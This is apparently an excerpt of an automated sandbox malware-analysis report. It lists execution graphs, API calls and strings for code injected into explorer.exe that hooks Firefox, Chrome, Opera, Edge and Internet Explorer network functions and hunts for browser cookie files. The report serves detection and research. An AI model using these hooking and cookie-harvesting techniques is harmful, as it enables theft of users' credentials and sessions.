                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F801DB323002247BD3202B76DC58EAF755FDB877A4F05032DF556A63D1DE615D0941B0

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:13.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:224
                                                                                                                                                                                                                              Total number of Limit Nodes:12
                                                                                                                                                                                                                              execution_graph 1592 30432f4 1593 3043302 1592->1593 1594 304335f 1593->1594 1595 304332b RtlEnterCriticalSection 1593->1595 1596 3043342 1595->1596 1601 304334e 1595->1601 1597 3042faa 16 API calls 1596->1597 1598 3043347 1597->1598 1600 3042f1f 22 API calls 1598->1600 1599 3043357 RtlLeaveCriticalSection 1599->1594 1600->1601 1601->1599 1337 3043401 1338 3043442 1337->1338 1339 304340a 1337->1339 1347 3041274 VirtualQuery 1339->1347 1342 3043416 RtlEnterCriticalSection 1349 3043132 1342->1349 1348 304128b 1347->1348 1348->1338 1348->1342 1350 304314d 1349->1350 1363 30432e8 1349->1363 1350->1363 1373 3041000 GetProcessHeap RtlAllocateHeap 1350->1373 1352 30431cd 1374 3041000 GetProcessHeap RtlAllocateHeap 1352->1374 1354 3043212 1355 304322c lstrlen 1354->1355 1356 30432d8 1354->1356 1355->1356 1358 304323d 1355->1358 1357 3041011 3 API calls 1356->1357 1360 30432df 1357->1360 1375 3041141 lstrlen lstrlen 1358->1375 1362 3041011 3 API calls 1360->1362 1362->1363 1370 3042f1f 1363->1370 1365 3043260 1378 3041000 GetProcessHeap RtlAllocateHeap 1365->1378 1367 304327f wsprintfA lstrcat 1379 3041011 1367->1379 1369 30432b8 lstrcat lstrlen RtlMoveMemory 1369->1356 1371 3042f23 CreateThread CloseHandle 1370->1371 1372 3042f3c RtlLeaveCriticalSection 1370->1372 1371->1372 1384 3042ed2 1371->1384 1372->1338 1373->1352 1374->1354 1376 3041162 1375->1376 1376->1356 1377 3041000 GetProcessHeap RtlAllocateHeap 1376->1377 1377->1365 1378->1367 1380 3041274 VirtualQuery 1379->1380 1381 3041019 1380->1381 1382 304102d 1381->1382 1383 304101d GetProcessHeap RtlFreeHeap 1381->1383 1382->1369 1383->1382 1385 3042f16 RtlExitUserThread 1384->1385 1386 3042edd 1384->1386 1396 304178c lstrlen 1386->1396 1389 3042f0e 1390 3041011 3 API calls 1389->1390 1390->1385 1394 3042f07 1395 3041011 3 API calls 1394->1395 1395->1389 1397 30417a4 CryptBinaryToStringA 1396->1397 1398 30417d3 1396->1398 1397->1398 1399 30417b7 1397->1399 1398->1389 1402 3041b1b 1398->1402 1414 3041000 GetProcessHeap RtlAllocateHeap 1399->1414 1401 30417c2 CryptBinaryToStringA 1401->1398 1403 3041b31 lstrlen 1402->1403 1404 3041b3e 1402->1404 1403->1404 1415 3041000 GetProcessHeap RtlAllocateHeap 1404->1415 1406 3041b46 lstrcat 1407 3041b82 1406->1407 1408 3041b7b lstrcat 1406->1408 1416 304186c 1407->1416 1408->1407 1411 3041011 3 API calls 1412 3041ba5 1411->1412 1413 304105d VirtualFree 1412->1413 1413->1394 1414->1401 1415->1406 1439 3041000 GetProcessHeap RtlAllocateHeap 1416->1439 1418 3041890 1440 304106c lstrlen MultiByteToWideChar 1418->1440 1420 304189f 1441 30417dc RtlZeroMemory 1420->1441 1423 30418f1 RtlZeroMemory 1426 3041926 1423->1426 1424 3041011 3 API calls 1425 3041b10 1424->1425 1425->1411 1427 3041af3 1426->1427 1443 3041000 GetProcessHeap RtlAllocateHeap 1426->1443 1427->1424 1429 30419e2 wsprintfW 1430 3041a02 1429->1430 1438 3041add 1430->1438 1444 3041000 GetProcessHeap RtlAllocateHeap 1430->1444 1431 3041011 3 API calls 1431->1427 1433 3041ad6 1436 3041011 3 API calls 1433->1436 1434 3041a70 1434->1433 1445 304104c VirtualAlloc 1434->1445 1436->1438 1437 3041ac6 RtlMoveMemory 1437->1433 1438->1431 1439->1418 1440->1420 1442 30417fe 1441->1442 1442->1423 1442->1427 1443->1429 1444->1434 1445->1437 1602 3043371 1603 30433b2 1602->1603 1604 304337a 1602->1604 1605 3041274 VirtualQuery 1604->1605 1606 3043382 1605->1606 1606->1603 1607 3043386 RtlEnterCriticalSection 1606->1607 1608 3043132 13 API calls 1607->1608 1609 30433a3 1608->1609 1610 3042f1f 22 API calls 1609->1610 1611 30433aa RtlLeaveCriticalSection 1610->1611 1611->1603 1446 3042cce 1447 3042cd7 1446->1447 1448 3042d02 1447->1448 1450 3042678 1447->1450 1451 3042691 1450->1451 1457 3042721 1450->1457 1452 3041274 VirtualQuery 1451->1452 1451->1457 1453 30426a7 1452->1453 1454 3042753 1453->1454 1456 304279e 1453->1456 1453->1457 1459 30426e9 1453->1459 1464 3041000 GetProcessHeap RtlAllocateHeap 1454->1464 1460 30427ad 1456->1460 1465 3041000 GetProcessHeap RtlAllocateHeap 1456->1465 1457->1448 1458 3042768 memcpy 1458->1457 1462 3042700 memcpy 1459->1462 1463 30427c7 memcpy 1460->1463 1462->1457 1463->1457 1464->1458 1465->1463 1580 3042c18 1581 3042c2a 1580->1581 1582 3042c82 1581->1582 1583 3042bf2 11 API calls 1581->1583 1584 3042c45 1583->1584 1584->1582 1585 3041141 2 API calls 1584->1585 1586 3042c59 1585->1586 1587 3042c5d lstrlen 1586->1587 1588 3042c79 1586->1588 1590 3042678 6 API calls 1587->1590 1591 304105d VirtualFree 1588->1591 1590->1588 1591->1582 1466 3043449 RtlEnterCriticalSection 1467 30434ce 1466->1467 1468 304346e 1466->1468 1469 30435bc RtlLeaveCriticalSection 1467->1469 1470 3041274 VirtualQuery 1467->1470 1468->1467 1468->1469 1472 3041274 VirtualQuery 1468->1472 1471 30434e9 1470->1471 1471->1469 1474 30434fd RtlZeroMemory 1471->1474 1498 30435b1 1471->1498 1473 3043485 1472->1473 1473->1467 1476 3041274 VirtualQuery 1473->1476 1535 3042f3d 1474->1535 1478 3043494 1476->1478 1478->1467 1480 3043498 lstrcat 1478->1480 1479 3043526 StrToIntA 1479->1469 1481 304353b 1479->1481 1499 3042faa 1480->1499 1483 3041141 2 API calls 1481->1483 1485 3043549 1483->1485 1485->1469 1488 3043595 1485->1488 1489 3043558 1485->1489 1486 3042f1f 22 API calls 1487 30434c3 1486->1487 1534 304105d VirtualFree 1487->1534 1491 3042faa 16 API calls 1488->1491 1492 3043574 1489->1492 1547 304105d VirtualFree 1489->1547 1495 30435aa 1491->1495 1548 304104c VirtualAlloc 1492->1548 1497 3042f1f 22 API calls 1495->1497 1496 3043585 RtlMoveMemory 1496->1469 1497->1498 1498->1469 1500 3041141 2 API calls 1499->1500 1501 3042fbf 1500->1501 1502 3042fd1 1501->1502 1504 3041141 2 API calls 1501->1504 1506 3043129 1502->1506 1549 3041000 GetProcessHeap RtlAllocateHeap 1502->1549 1504->1502 1505 3042fe6 1550 3041000 GetProcessHeap RtlAllocateHeap 1505->1550 1506->1486 1508 3042ff1 RtlZeroMemory 1509 3042f3d 3 API calls 1508->1509 1510 3043013 1509->1510 1511 304301e StrToIntA 1510->1511 1512 3043118 1510->1512 1511->1512 1513 3043038 1511->1513 1514 3041011 3 API calls 1512->1514 1515 3042f3d 3 API calls 1513->1515 1516 3043120 1514->1516 1518 3043047 1515->1518 1517 3041011 3 API calls 1516->1517 1517->1506 1518->1512 1519 3043051 lstrlen 1518->1519 1520 3042f3d 3 API calls 1519->1520 1521 3043066 1520->1521 1522 3041141 2 API calls 1521->1522 1523 3043074 1522->1523 1523->1512 1551 3041000 GetProcessHeap RtlAllocateHeap 1523->1551 1525 304308b 1526 3042f3d 3 API calls 1525->1526 1527 30430a4 wsprintfA 1526->1527 1552 3041000 GetProcessHeap RtlAllocateHeap 1527->1552 1529 30430cc 1530 3042f3d 3 API calls 1529->1530 1531 30430dd lstrcat 1530->1531 1532 3041011 3 API calls 1531->1532 1533 30430ee lstrcat lstrlen RtlMoveMemory 1532->1533 1533->1512 1534->1467 1536 3042f61 1535->1536 1537 3042f4b 1535->1537 1539 3041141 2 API calls 1536->1539 1538 3041141 2 API calls 1537->1538 1544 3042f57 1538->1544 1540 3042f66 1539->1540 1541 3042fa4 1540->1541 1542 3041141 2 API calls 1540->1542 1541->1469 1541->1479 1542->1544 1543 3041141 2 API calls 1545 3042f8e 1543->1545 1544->1541 1544->1543 1545->1541 1546 3042f92 RtlMoveMemory 1545->1546 1546->1541 1547->1492 1548->1496 1549->1505 1550->1508 1551->1525 1552->1529 1553 3042c8a 1561 3042bf2 1553->1561 1555 3042c9b 1556 3042cc6 1555->1556 1557 3042ca1 lstrlen 1555->1557 1558 3042678 6 API calls 1557->1558 1559 3042cbd 1558->1559 1566 304105d VirtualFree 1559->1566 1567 304224c 1561->1567 1565 3042c09 1565->1555 1566->1556 1578 3041000 GetProcessHeap RtlAllocateHeap 1567->1578 1569 3042254 1570 30423e3 1569->1570 1579 304104c VirtualAlloc 1570->1579 1572 3042633 1572->1565 1573 30425b5 lstrcat lstrcat lstrcat lstrcat 1575 30423fc 1573->1575 1574 3041011 GetProcessHeap RtlFreeHeap VirtualQuery 1574->1575 1575->1572 1575->1573 1575->1574 1576 3042346 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap VirtualQuery 1575->1576 1577 304231f GetProcessHeap RtlAllocateHeap memcpy 1575->1577 1576->1575 1577->1575 1578->1569 1579->1575

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_03041305 1 Function_03041000 2 Function_03043401 8 Function_03042F1F 2->8 20 Function_03043132 2->20 48 Function_03041274 2->48 3 Function_03048702 4 Function_03041C08 28 Function_0304104C 4->28 54 Function_03041C82 4->54 72 Function_03041BAF 4->72 87 Function_03041BD2 4->87 5 Function_03043709 5->1 7 Function_03041011 5->7 42 Function_03041363 5->42 77 Function_030415BE 5->77 6 Function_03049814 7->48 86 Function_03042ED2 8->86 9 Function_0304231F 9->1 10 Function_03042C18 26 Function_03041141 10->26 35 Function_0304105D 10->35 52 Function_03042678 10->52 99 Function_03042BF2 10->99 11 Function_03041B1B 11->1 11->7 44 Function_0304186C 11->44 12 Function_03042E1B 12->1 12->7 13 Function_03041320 14 Function_03049321 15 Function_03043829 15->5 69 Function_030436A1 15->69 84 Function_030435D4 15->84 16 Function_03041235 17 Function_03048A37 18 Function_03049337 19 Function_03045137 20->1 20->7 20->26 21 Function_03042F3D 21->26 22 Function_0304133F 23 Function_03049844 24 Function_03042346 24->1 24->7 60 Function_03042296 24->60 25 Function_03043840 27 Function_03042643 29 Function_03041E4C 30 Function_0304224C 30->1 31 Function_03041F4E 32 Function_03043449 32->8 32->21 32->26 32->28 32->35 32->48 76 Function_03042FAA 32->76 33 Function_0304104A 34 Function_03049955 36 Function_0304285F 36->26 37 Function_03042659 38 Function_03041765 39 Function_03041261 40 Function_03043862 40->0 40->1 40->4 40->7 40->13 40->15 40->16 40->26 40->39 40->48 57 Function_0304118D 40->57 61 Function_03041090 40->61 66 Function_03042D9A 40->66 73 Function_03042EA8 40->73 75 Function_030412AA 40->75 79 Function_030416C7 40->79 92 Function_03041FE5 40->92 41 Function_03049763 42->22 43 Function_0304106C 44->1 44->7 44->28 44->43 44->61 88 Function_030417DC 44->88 45 Function_0304926D 46 Function_03042B6E 46->7 46->11 46->35 46->46 49 Function_03042974 46->49 55 Function_0304178C 46->55 94 Function_030427E7 46->94 47 Function_0304966A 49->1 49->7 49->26 49->28 49->35 49->36 49->38 71 Function_030428AD 49->71 50 Function_03048A71 51 Function_03043371 51->8 51->20 51->48 52->1 52->48 53 Function_03048B81 91 Function_03041CE5 54->91 55->1 56 Function_03043D8D 56->1 56->40 56->48 56->56 95 Function_03043BE1 56->95 58 Function_03042C8A 58->35 58->52 58->99 59 Function_03042295 62 Function_03048F93 63 Function_0304929C 64 Function_03048A9F 65 Function_03045198 67 Function_03041CA5 67->91 68 Function_030450A0 69->1 69->7 69->42 89 Function_030414D8 69->89 70 Function_030423A2 71->26 73->12 74 Function_030415A9 76->1 76->7 76->21 76->26 77->1 77->7 77->74 77->77 78 Function_030433B9 78->8 78->20 78->48 80 Function_03048CC3 81 Function_030487CE 82 Function_03042CCE 82->52 83 Function_030493D4 84->1 84->7 84->42 84->89 85 Function_030413D7 86->7 86->11 86->35 86->55 87->67 89->1 89->7 89->85 100 Function_030413FE 89->100 90 Function_030495E5 92->29 92->31 92->48 93 Function_030498E7 94->7 94->48 95->0 95->1 95->13 95->15 95->16 95->26 95->39 95->48 95->61 95->73 95->75 95->92 96 Function_030423E3 96->7 96->9 96->24 96->28 96->70 97 Function_03048EEF 98 Function_030432F4 98->8 98->76 99->30 99->96 100->1 100->7 100->85 100->89 101 Function_030489F9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 3043862-30438de call 3041000 GetModuleFileNameA call 3041000 GetCurrentProcessId wsprintfA call 304118d CreateMutexA GetLastError 7 30438e4-3043940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 3041000 Sleep lstrcmpiA 0->7 8 3043bc5-3043c3a call 3041011 * 2 RtlExitUserThread call 3041000 * 2 wsprintfA call 3041235 0->8 13 3043946-3043961 GetCommandLineW CommandLineToArgvW 7->13 14 3043a0a-3043a14 lstrcmpiA 7->14 69 3043c3c-3043c4c call 3041141 8->69 70 3043c5e 8->70 16 3043967-304398b call 30416c7 GetModuleHandleA GetProcAddress 13->16 17 3043bc3-3043bc4 13->17 19 3043b14-3043b39 call 30416c7 GetModuleHandleA GetProcAddress 14->19 20 3043a1a-3043a24 lstrcmpiA 14->20 33 304398d-3043999 call 3041c08 16->33 34 304399e-30439c0 GetModuleHandleA GetProcAddress 16->34 17->8 35 3043b4c-3043b59 GetModuleHandleA GetProcAddress 19->35 36 3043b3b-3043b47 call 3041c08 19->36 20->19 24 3043a2a-3043a40 lstrcmpiA 20->24 28 3043a67-3043a71 lstrcmpiA 24->28 29 3043a42-3043a4e GetCommandLineA StrStrIA 24->29 31 3043a73-3043a7f GetCommandLineA StrStrIA 28->31 32 3043a88-3043a92 lstrcmpiA 28->32 29->28 30 3043a50 29->30 38 3043a55-3043a65 GetModuleHandleA 30->38 31->32 39 3043a81-3043a86 31->39 32->17 40 3043a98-3043aa4 GetCommandLineA StrStrIA 32->40 33->34 42 30439d6-30439e8 GetModuleHandleA GetProcAddress 34->42 43 30439c2-30439d0 GetModuleHandleA GetProcAddress 34->43 45 3043b6c-3043b79 GetModuleHandleA GetProcAddress 35->45 46 3043b5b-3043b67 call 3041c08 35->46 36->35 51 3043ace-3043ad2 38->51 39->38 40->17 52 3043aaa-3043ac5 GetModuleHandleA 40->52 54 30439f9-3043a05 42->54 55 30439ea-30439f3 GetModuleHandleA GetProcAddress 42->55 43->42 53 3043b08-3043b0f call 30416c7 43->53 49 3043b8c-3043bbe call 30416c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->49 50 3043b7b-3043b87 call 3041c08 45->50 46->45 49->17 50->49 51->17 62 3043ad8-3043aea call 30416c7 call 3042d9a 51->62 61 3043ac7-3043acc GetModuleHandleA 52->61 52->62 53->17 63 3043b03 call 3041c08 54->63 55->53 55->54 61->51 62->53 82 3043aec-3043af5 call 3041274 62->82 63->53 79 3043c53-3043c59 call 3041261 69->79 80 3043c4e call 3043829 69->80 73 3043c64-3043c74 CreateToolhelp32Snapshot 70->73 76 3043d7d-3043d88 Sleep 73->76 77 3043c7a-3043c8e Process32First 73->77 76->73 81 3043d6e-3043d70 77->81 79->70 80->79 86 3043d76-3043d77 CloseHandle 81->86 87 3043c93-3043ca5 lstrcmpiA 81->87 82->53 91 3043af7-3043b01 82->91 86->76 89 3043ca7-3043cb5 lstrcmpiA 87->89 90 3043cda-3043ce3 call 30412aa 87->90 89->90 93 3043cb7-3043cc5 lstrcmpiA 89->93 97 3043ce5-3043cee call 3041305 90->97 98 3043d62-3043d68 Process32Next 90->98 91->63 93->90 94 3043cc7-3043cd4 call 3042ea8 93->94 94->90 94->98 97->98 102 3043cf0-3043cf7 call 3041320 97->102 98->81 102->98 105 3043cf9-3043d06 call 3041274 102->105 105->98 108 3043d08-3043d5d lstrcmpiA call 3041090 call 3041fe5 call 3041090 105->108 108->98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 03043886
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000001), ref: 0304389B
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 030438B6
                                                                                                                                                                                                                                • Part of subcall function 0304118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 030411A9
                                                                                                                                                                                                                                • Part of subcall function 0304118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 030411C1
                                                                                                                                                                                                                                • Part of subcall function 0304118D: lstrlen.KERNEL32(?,00000000), ref: 030411C9
                                                                                                                                                                                                                                • Part of subcall function 0304118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 030411D4
                                                                                                                                                                                                                                • Part of subcall function 0304118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 030411EE
                                                                                                                                                                                                                                • Part of subcall function 0304118D: wsprintfA.USER32 ref: 03041205
                                                                                                                                                                                                                                • Part of subcall function 0304118D: CryptDestroyHash.ADVAPI32(?), ref: 0304121E
                                                                                                                                                                                                                                • Part of subcall function 0304118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 03041228
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 030438CD
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 030438D3
                                                                                                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(03046038), ref: 030438F3
                                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 030438FA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(03045CDE,00000000), ref: 03043910
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0304392A
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0304393C
                                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(?), ref: 0304394F
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0304397E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043987
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 030439AF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 030439B2
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 030439C4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 030439C7
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 030439E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 030439E4
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 030439EC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 030439EF
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 03043A6D
                                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(NetworkService), ref: 03043A78
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 03043A7B
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 03043A8E
                                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(NetworkService), ref: 03043A9D
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 03043AA0
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(opera.dll), ref: 03043ABF
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 03043ACC
                                                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 03043956
                                                                                                                                                                                                                                • Part of subcall function 030416C7: GetCurrentProcessId.KERNEL32 ref: 030416D9
                                                                                                                                                                                                                                • Part of subcall function 030416C7: GetCurrentThreadId.KERNEL32 ref: 030416E1
                                                                                                                                                                                                                                • Part of subcall function 030416C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 030416F1
                                                                                                                                                                                                                                • Part of subcall function 030416C7: Thread32First.KERNEL32(00000000,0000001C), ref: 030416FF
                                                                                                                                                                                                                                • Part of subcall function 030416C7: CloseHandle.KERNEL32(00000000), ref: 03041758
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 03043A10
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 03043A20
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 03043A30
                                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(NetworkService), ref: 03043A47
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 03043A4A
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(chrome.dll), ref: 03043A5F
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 03043B2C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043B35
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 03043B52
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043B55
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 03043B72
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043B75
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 03043B99
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043B9C
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 03043BA9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043BAC
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 03043BB9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03043BBC
                                                                                                                                                                                                                                • Part of subcall function 03041C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 03041C42
                                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 03043BD9
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 03043C1F
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03043C69
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 03043C88
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 03043D77
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 03043D82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                                                                                                                                                                                              • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                                                                                                                                                                                              • API String ID: 2480436012-2618538661
                                                                                                                                                                                                                              • Opcode ID: c42a15d242453adbe8ac9a66f9f65f7801c29b03dd8a5e48c99d960b57d0bcbb
                                                                                                                                                                                                                              • Instruction ID: 81d6a8088f33d7c7e845b54962072e2b66ef7fb01c1f9e40375d7b0afb97bb8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c42a15d242453adbe8ac9a66f9f65f7801c29b03dd8a5e48c99d960b57d0bcbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37A127F8A43318ABC714FB72AD09F6F7ADC9F81640B050578E911DB145EB79CB118AA1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 030415EB
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?), ref: 030415F7
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,030441C8), ref: 03041623
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,030441CC), ref: 03041633
                                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,?,?), ref: 0304164C
                                                                                                                                                                                                                              • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 03041661
                                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,?,?), ref: 0304167E
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0304169C
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 030416AB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                                                                                                                                                                                              • String ID: *.*$Cookies*
                                                                                                                                                                                                                              • API String ID: 4256701249-3228320225
                                                                                                                                                                                                                              • Opcode ID: fc17c5c3a251b4d8ca4bacc2d720c02d462a668f92f588e2144a51ab01cd6c2f
                                                                                                                                                                                                                              • Instruction ID: afb8e797844915df2fea2832651a488818edeb5411a01dde77e1fa5b84bf088a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc17c5c3a251b4d8ca4bacc2d720c02d462a668f92f588e2144a51ab01cd6c2f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21A5F42063059BD314EA66A984B7F7BECAB88285F080539F941D7241DB78DB4446A2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 030413FE: wsprintfW.USER32 ref: 0304142A
                                                                                                                                                                                                                                • Part of subcall function 030413FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 03041439
                                                                                                                                                                                                                                • Part of subcall function 030413FE: wsprintfW.USER32 ref: 03041476
                                                                                                                                                                                                                                • Part of subcall function 030413FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 0304149C
                                                                                                                                                                                                                                • Part of subcall function 030413FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 030414AF
                                                                                                                                                                                                                                • Part of subcall function 030413FE: FindClose.KERNELBASE(00000000), ref: 030414BA
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0304150D
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03041557
                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 03041571
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 0304158F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
